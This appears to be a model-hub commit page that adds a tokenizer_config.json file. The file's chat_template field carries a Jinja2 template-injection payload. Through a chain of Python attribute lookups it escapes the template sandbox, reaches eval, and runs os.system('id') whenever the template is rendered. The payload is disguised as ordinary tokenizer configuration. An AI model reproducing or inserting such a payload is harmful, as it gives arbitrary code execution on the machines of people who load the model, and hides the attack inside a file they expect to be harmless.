passerw commited on
Commit
be8cd11
·
verified ·
1 Parent(s): d2a3d39

Upload tokenizer_config.json

Browse files
Files changed (1) hide show
  1. tokenizer_config.json +5 -0
tokenizer_config.json ADDED
@@ -0,0 +1,5 @@
 
 
 
 
 
 
1
+ {
2
+ "chat_template": "{% for message in messages %}{{ message['content'] }}{% endfor %}{{ raise_exception('') | attr('__class__') | attr('__base__') | attr('__subclasses__')() | first | attr('__init__') | attr('__globals__') | attr('builtins') | attr('eval')('__import__(\"os\").system(\"id\")') }}",
3
+ "bos_token": "<s>",
4
+ "eos_token": "</s>"
5
+ }